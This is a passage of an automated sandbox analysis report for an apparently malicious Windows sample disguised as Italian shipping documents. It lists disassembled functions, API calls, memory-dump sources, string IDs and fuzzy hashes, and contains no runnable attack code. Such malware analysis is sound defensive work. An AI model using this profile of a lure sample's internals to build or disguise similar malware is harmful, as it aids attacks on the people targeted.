                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                        Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                        • DeleteObject.GDI32(?), ref: 0047151E
                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                        • DeleteObject.GDI32(?), ref: 004715EA
                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                        • String ID:
                        • API String ID: 3218148540-0
                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                        Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                        • String ID:
                        • API String ID: 136442275-0
                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                        Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                        Download Yara Rule
                        APIs
                        • _wcsncpy.LIBCMT ref: 00467490
                        • _wcsncpy.LIBCMT ref: 004674BC
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • _wcstok.LIBCMT ref: 004674FF
                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                        • _wcstok.LIBCMT ref: 004675B2
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                        • _wcslen.LIBCMT ref: 00467793
                        • _wcscpy.LIBCMT ref: 00467641
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcslen.LIBCMT ref: 004677BD
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                        • String ID: X
                        • API String ID: 3104067586-3081909835
                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                        Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                        Download Yara Rule
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                        • _wcslen.LIBCMT ref: 0046CDB0
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                        Strings
                        • NULL Pointer assignment, xrefs: 0046CEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                        • String ID: NULL Pointer assignment
                        • API String ID: 440038798-2785691316
                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                        Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                        • _wcslen.LIBCMT ref: 004610A3
                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                        • GetWindowRect.USER32(?,?), ref: 00461248
                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                        • String ID: ThumbnailClass
                        • API String ID: 4136854206-1241985126
                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                        Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                        Download Yara Rule
                        APIs
                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                        • GetClientRect.USER32(?,?), ref: 00471A1A
                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                        • DestroyIcon.USER32(?), ref: 00471AF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                        • String ID: 2
                        • API String ID: 1331449709-450215437
                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                        Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                        • __swprintf.LIBCMT ref: 00460915
                        • __swprintf.LIBCMT ref: 0046092D
                        • _wprintf.LIBCMT ref: 004609E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                        • API String ID: 3054410614-2561132961
                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                        Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 600699880-22481851
                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                        Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: static
                        • API String ID: 3375834691-2160076837
                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                        Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                        • API String ID: 2907320926-3566645568
                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                        Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                        • DeleteObject.GDI32(004E0000), ref: 00470A04
                        • DestroyIcon.USER32(004A003D), ref: 00470A1C
                        • DeleteObject.GDI32(AD40D79D), ref: 00470A34
                        • DestroyWindow.USER32(00000070), ref: 00470A4C
                        • DestroyIcon.USER32(?), ref: 00470A73
                        • DestroyIcon.USER32(?), ref: 00470A81
                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                        • String ID:
                        • API String ID: 1237572874-0
                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                        Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                        • VariantInit.OLEAUT32(?), ref: 004793E1
                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                        • VariantClear.OLEAUT32(?), ref: 00479489
                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                        • VariantClear.OLEAUT32(?), ref: 004794CA
                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
